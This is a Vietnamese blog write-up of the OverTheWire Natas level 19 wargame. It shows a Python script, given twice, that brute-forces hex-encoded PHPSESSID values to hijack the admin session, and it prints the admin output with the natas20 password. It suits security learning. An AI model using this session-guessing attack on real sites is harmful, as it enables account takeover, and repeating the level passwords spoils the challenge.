[OverTheWire] Natas – Level 19

http://natas19.natas.labs.overthewire.org/

This page uses mostly the same code as the previous level, but session IDs are no longer sequential…

Please login with your admin account to retrieve credentials for natas20.

Không có View sourcecode, tuy nhiên dựa vào lời tựa, ta có thể hiểu là nó cũng tương tự bài 18, chỉ khác là giá trị của PHPSESSID sẽ không còn đơn giản nữa.

Thử login với:

username:password = yeuchimse:123456

Kiểm tra cookie:

PHPSESSID=3334332d7965756368696d7365

Khá giống một xâu HEX, decode:

343-yeuchimse

Đơn giản đến không ngờ. Như vậy ta chỉ cần dò giống hệt bài trước, khác mỗi cái cơ chế encode của biến PHPSESSID:

import urllib, urllib2
def get_url_content(url, cookie, post_data):
	if (post_data != None):
		req = urllib2.Request(url, urllib.urlencode(post_data))
	else:
		req = urllib2.Request(url)

	req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130606 Firefox/24.0')

	if (cookie != None):
		req.add_header('Cookie', cookie)
	if (post_data != None):
		req.add_header('Content-type', 'application/x-www-form-urlencoded')

	source = urllib2.urlopen(req).read()
	return source

passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, "http://natas19.natas.labs.overthewire.org/index.php?debug", 'natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman)))

for i in range(640):
	hex_str = ''
	for c in str(i):
		hex_str += str(int(c) + 30)
	ssid = '%s2d61646d696e' % hex_str
	cookie = '__utma=176859643.181140426.1376493275.1376510682.1376530453.7; __utmz=176859643.1376493275.1.1.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/l.php; PHPSESSID=%s' % ssid
	source = get_url_content('http://natas19.natas.labs.overthewire.org/index.php?debug', cookie, None)
	source = source.split('<div id="content">')[1].split('</div>')[0]
	print 'id: %s' % i, ';', 'ssid: %s' % ssid
	print source

	if ('You are an admin' in source):
		break

import urllib, urllib2

def get_url_content(url, cookie, post_data):

if (post_data != None):

req = urllib2.Request(url, urllib.urlencode(post_data))

else:

req = urllib2.Request(url)

req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20130606 Firefox/24.0')

if (cookie != None):

req.add_header('Cookie', cookie)

if (post_data != None):

req.add_header('Content-type', 'application/x-www-form-urlencoded')

source = urllib2.urlopen(req).read()

return source

passman = urllib2.HTTPPasswordMgrWithDefaultRealm()

passman.add_password(None, "http://natas19.natas.labs.overthewire.org/index.php?debug", 'natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')

urllib2.install_opener(urllib2.build_opener(urllib2.HTTPBasicAuthHandler(passman)))

for i in range(640):

hex_str = ''

for c in str(i):

hex_str += str(int(c) + 30)

ssid = '%s2d61646d696e' % hex_str

cookie = '__utma=176859643.181140426.1376493275.1376510682.1376530453.7; __utmz=176859643.1376493275.1.1.utmcsr=facebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/l.php; PHPSESSID=%s' % ssid

source = get_url_content('http://natas19.natas.labs.overthewire.org/index.php?debug', cookie, None)

source = source.split('<div id="content">')[1].split('</div>')[0]

print 'id: %s' % i, ';', 'ssid: %s' % ssid

print source

if ('You are an admin' in source):

break

Kết quả là ta tìm được admin tại id = 176

id: 176 ; ssid: 3137362d61646d696e

<p>
<b>
This page uses mostly the same code as the previous level, but session IDs are no longer sequential...
</b>
</p>
DEBUG: Session start ok<br />You are an admin. The credentials for the next level are:<br /><pre>Username: natas20
Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF</pre>

id: 176 ; ssid: 3137362d61646d696e

<p>

<b>

This page uses mostly the same code as the previous level, but session IDs are no longer sequential...

</b>

</p>

DEBUG: Session start ok<br />You are an admin. The credentials for the next level are:<br /><pre>Username: natas20

Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF</pre>

→ flag = eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF.

Yêu CTF

CTF chưa bao giờ khiến tôi mệt mỏi…

[OverTheWire] Natas – Level 19

Leave a Reply Cancel reply